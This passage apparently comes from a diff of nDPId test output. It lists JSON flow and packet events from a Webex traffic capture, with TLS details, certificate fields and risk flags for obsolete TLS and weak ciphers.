{"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636364,"flow_last_seen":1444570636369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636369,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636387,"flow_last_seen":1444570636387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636387,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1444570636387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636387,"pkt":"ABoRAAACABoRAAABCABFAAA82lhAAEAGrK8KCAABQERpZ6GqAbsG3RlZAAAAAKACOQjUWwAAAgQFtAQCCAoATMMBAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1444570636395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAoAadAABAGtXVARGlnCggAAQG7oar5IuamBt0ZWlAS\/\/9YuAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1444570636395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636395,"pkt":"ABoRAAACABoRAAABCABFAAAo2llAAEAGrMIKCAABQERpZ6GqAbsG3Rla+SLmp1AQOQgfsQAA"} 
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust 
Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":355,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636364,"flow_last_seen":1444570636827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636827,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":356,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636387,"flow_last_seen":1444570636828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636828,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":357,"source":"webex.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636359,"flow_last_seen":1444570636829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636829,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.97","src_port":51370,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636259,"flow_last_seen":1444570636894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636894,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust 
Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636387,"flow_last_seen":1444570636397,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636397,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
(v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":328,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636180,"flow_last_seen":1444570636471,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636471,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
+01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":335,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636160,"flow_last_seen":1444570636701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636701,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636248,"flow_last_seen":1444570636703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570636703,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":341,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636255,"flow_last_seen":1444570636706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636706,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, 
CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":347,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636170,"flow_last_seen":1444570636773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570636773,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec 